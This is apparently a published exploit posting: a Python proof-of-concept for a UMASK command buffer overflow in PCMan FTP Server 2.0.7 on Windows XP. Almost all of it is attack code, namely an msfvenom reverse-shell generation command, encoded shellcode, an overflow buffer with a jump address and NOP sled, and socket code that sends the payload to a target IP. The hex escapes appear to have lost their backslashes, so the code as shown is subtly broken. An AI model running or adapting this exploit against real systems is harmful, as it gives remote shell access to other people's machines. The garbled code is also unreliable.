PCMan FTP Server 2.0.7 UMASK Buffer Overflow
Posted on 02 November 2016
#!/usr/bin/env python # -*- coding: utf-8 -*- # Exploit Title: PCMan's FTP Server 2.0.7 UMASK Command Buffer Overflow Exploit # Date: 1/11/2016 # Exploit Author: Eagleblack # Tested on: Windows XP Profesional SP3 Spanish version x86 # CVE : N/A import socket ret="x10xb3x3dx7e" #USER32 this dll have a jump to ESP stack pointer #Metasploit shellcode: #msfvenom -p windows/shell_reverse_tcp LHOST='IP address Local host' LPORT='' -b 'x00x0ax0d' -f c shellcode = ("xd9xe5xbax7exd1x2cx95xd9x74x24xf4x58x33xc9xb1" "x52x31x50x17x83xe8xfcx03x2exc2xcex60x32x0cx8c" "x8bxcaxcdxf1x02x2fxfcx31x70x24xafx81xf2x68x5c" "x69x56x98xd7x1fx7fxafx50x95x59x9ex61x86x9ax81" "xe1xd5xcex61xdbx15x03x60x1cx4bxeex30xf5x07x5d" "xa4x72x5dx5ex4fxc8x73xe6xacx99x72xc7x63x91x2c" "xc7x82x76x45x4ex9cx9bx60x18x17x6fx1ex9bxf1xa1" "xdfx30x3cx0ex12x48x79xa9xcdx3fx73xc9x70x38x40" "xb3xaexcdx52x13x24x75xbexa5xe9xe0x35xa9x46x66" "x11xaex59xabx2axcaxd2x4axfcx5axa0x68xd8x07x72" "x10x79xe2xd5x2dx99x4dx89x8bxd2x60xdexa1xb9xec" "x13x88x41xedx3bx9bx32xdfxe4x37xdcx53x6cx9ex1b" "x93x47x66xb3x6ax68x97x9axa8x3cxc7xb4x19x3dx8c" "x44xa5xe8x03x14x09x43xe4xc4xe9x33x8cx0exe6x6c" "xacx31x2cx05x47xc8xa7xeax30xd3x30x83x42xd3x3f" "xe8xcax35x55x1ex9bxeexc2x87x86x64x72x47x1dx01" "xb4xc3x92xf6x7bx24xdexe4xecxc4x95x56xbaxdbx03" "xfex20x49xc8xfex2fx72x47xa9x78x44x9ex3fx95xff" "x08x5dx64x99x73xe5xb3x5ax7dxe4x36xe6x59xf6x8e" "xe7xe5xa2x5exbexb3x1cx19x68x72xf6xf3xc7xdcx9e" "x82x2bxdfxd8x8ax61xa9x04x3axdcxecx3bxf3x88xf8" "x44xe9x28x06x9fxa9x59x4dxbdx98xf1x08x54x99x9f" "xaax83xdex99x28x21x9fx5dx30x40x9ax1axf6xb9xd6" "x33x93xbdx45x33xb6") buffer = 'x41'* 2006 + ret + 'x90'* 30 + shellcode #EIP overwritten at offset 2006 print "Sending Buffer" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #open socket connect = s.connect(('192.168.1.13',21)) #IP address and port (21) from the target s.recv(1024) #FTPBanner s.send('USER anonymous ') #Sending USER s.recv(1024) s.send('PASS ') #Sending Password (Null password) s.recv(1024) s.send('UMASK' + buffer +' ') s.close()
